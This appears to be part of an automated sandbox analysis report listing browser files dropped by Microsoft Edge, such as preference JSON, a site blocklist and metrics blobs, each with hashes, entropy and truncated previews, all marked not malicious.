                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5126aade-6a68-4155-9c9e-d717e6cc761b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44707
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095130572740628
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kv1KKGf4c2nwsQvadHN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynTNN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:B1FE92019337B04326E7159BFA777225
                                                                                                                                                                                                                                                                                                                    SHA1:3D12CD4F49A5DFC1EEB3588FEAEE0006BBA0577F
                                                                                                                                                                                                                                                                                                                    SHA-256:136234E81205970C3F8D5B0BC3C9F9FDDEAADAE93A125C17D9C78C8839366655
                                                                                                                                                                                                                                                                                                                    SHA-512:AFFDE9E6C0965858F7E2B25B6C5940BF7E1E0C5E7E51E85CC0D593D615BF6FB9ED69756A3BFDFD7AE2689F0AC7728855257F355B26FFF0D13CCB0F11765BD104
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44236
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08953422668976
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kfTKKGf4S8tBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:AF5276A3A9B0DA56BF2CC4E9055F0114
                                                                                                                                                                                                                                                                                                                    SHA1:B0BE2350C9EAD3A5D403A60B8243AB623C3AF080
                                                                                                                                                                                                                                                                                                                    SHA-256:45FF59770005DCC4783F16AAA4B917750A5124439C0A13DE34E0B85B2AC61512
                                                                                                                                                                                                                                                                                                                    SHA-512:27420FC78C412A1F430349A39C3E0FD558A4476F1F903E198E69C7D0BD170FFC5C412D8851BBB5105F56220E112B0D7E5240ABA7B3212EA4CBD736AD22067D8C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.640132669903667
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
                                                                                                                                                                                                                                                                                                                    MD5:18D8F6617A5020376CEDA06FB42C24D5
                                                                                                                                                                                                                                                                                                                    SHA1:F921FF53D8E1A065550AD835D89E550FDF448795
                                                                                                                                                                                                                                                                                                                    SHA-256:C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
                                                                                                                                                                                                                                                                                                                    SHA-512:4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.640132669903667
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
                                                                                                                                                                                                                                                                                                                    MD5:18D8F6617A5020376CEDA06FB42C24D5
                                                                                                                                                                                                                                                                                                                    SHA1:F921FF53D8E1A065550AD835D89E550FDF448795
                                                                                                                                                                                                                                                                                                                    SHA-256:C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
                                                                                                                                                                                                                                                                                                                    SHA-512:4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                                                                                                                    MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                    SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                    SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                    SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                                                                                                                    MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                    SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                    SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                    SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.44786097735355646
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:3YVqbYW0uO0W1f5QBvqzsHs3xhiqufGNdzpL93AI7qnE5uMe8Og1HF:wqbFcQBYsHs3xbmKpL5AI7qn6uMe7aH
                                                                                                                                                                                                                                                                                                                    MD5:AEED4BD5BAE895F7A3A9B1901A74C461
                                                                                                                                                                                                                                                                                                                    SHA1:1EE289279502633519AEEAE0BF86EDBBD107AA33
                                                                                                                                                                                                                                                                                                                    SHA-256:583D62F9D22F499730300302685BC8A281C2FD48536CE501F25EEE89B0A05BF7
                                                                                                                                                                                                                                                                                                                    SHA-512:30DEFC285E0AC0D3EDAA9F5F2A1B1903FA6611C14226F1C2E610C1FF6A42612DDC4A223BC21F090A0E495FDE985DB73CDB66520375FDB83E9E76869901CDE744
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@..................P...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".fyjctm20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.................. .2........
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.04766218165642056
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:wIl0m5tmBnOAUJYsJ/7qiRDs0JVFg8Xk2IPhEHsBzhEhNGzMFRQ8IOw4n8y08Tcp:tl0Utu2F6Tnhcv7jw408T2RGOD
                                                                                                                                                                                                                                                                                                                    MD5:D093A7A63BE978F95ACF3F2C3879216D
                                                                                                                                                                                                                                                                                                                    SHA1:42EE9D51DA536F6F9DEC8C113B75B5043ADD2BEB
                                                                                                                                                                                                                                                                                                                    SHA-256:0B97A7A2731D61735760B1E55C550B5956B3DC9CC6EB856F75F52B47AB474852
                                                                                                                                                                                                                                                                                                                    SHA-512:0D8C3F0247F6750E59DE37C2F352ABF74B7837D2DC2C42CEE7B68E48BD0A6128C884DE3E36D262FE819CCAF9B470B93A4A9B4E1832A671EBB6C8C89AC0B9C7FC
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".fyjctm20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2............... .2.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                                                                                    MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                                                                                    SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                                                                                    SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                                                                                    SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):24853
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.565167420840084
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:58ycZ6WP4Sfba8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkZxn3rwxpWtuC:58ycZ6WP4Sfbau1jaZznkutJ
                                                                                                                                                                                                                                                                                                                    MD5:A6105DFFAE1483736B9CEC76D39A79E5
                                                                                                                                                                                                                                                                                                                    SHA1:3636AF870279CE7041E71C9E1E7399E70B76A382
                                                                                                                                                                                                                                                                                                                    SHA-256:435462BAA3FA448E9A0169400BB9795F297285A3E8F11644B0AE31ADF7A25FD5
                                                                                                                                                                                                                                                                                                                    SHA-512:10FC978F99DD665ACA72A048258D2D6345726FD6D0981F68D20D30011904E87EF3067C71FE2A22236265E827B39D290BC4ED8590EE16EC81E5F177179C097911
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377174552143414","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377174552143414","location":5,"ma
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):9576
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1121421679451435
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:st8kdpVCstYyaNP9kHgF8KbV+FyEQAZOP+YJ:st8QYstYtJfbGxQV
                                                                                                                                                                                                                                                                                                                    MD5:49050D6D8B063A91634693D5FD725A4B
                                                                                                                                                                                                                                                                                                                    SHA1:920C9AA0FBF820BAE95F259F0E38F59D6FD24AF1
                                                                                                                                                                                                                                                                                                                    SHA-256:DD1893CF0F6BE219C61C52C8A5B5A3AA836769D3ED0F7790EAF4EB7A58E4C356
                                                                                                                                                                                                                                                                                                                    SHA-512:E1C5EA530111CD62D8857C6162BFF4EDC433E9DA651CA04E357E63D19C609A89956D31600639B4362EE8FCC4425CC7D59AAC43FA581567C4BC0647EAC50ECA84
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377174552765759","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (17166), with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):17174
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.503607131580024
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:384:st8PGQSu4YstYtJw8BANnQCnz6p8UrbGxQwe:syOXueYQnMbGiF
                                                                                                                                                                                                                                                                                                                    MD5:915187C2E3A761B8BA277997B69257CB
                                                                                                                                                                                                                                                                                                                    SHA1:D088605C90D34F032DF2EB4D754A8394C8B5EE60
                                                                                                                                                                                                                                                                                                                    SHA-256:F5310CD6ED8A312C9FFF82F366511E123AA80071059A716DBFCA42719C87C9F1
                                                                                                                                                                                                                                                                                                                    SHA-512:E8FDF5D1A9A1DB8496FFEA3E6D8EEC18C88C4F5070370921370CFAADA474D108171E7AACA5564379FC06269AE055E0BEFA2D53DE093EE1C9404F9AD94AAF1848
                                                                                                                                                                                                                                                                                                                    Malicious:false
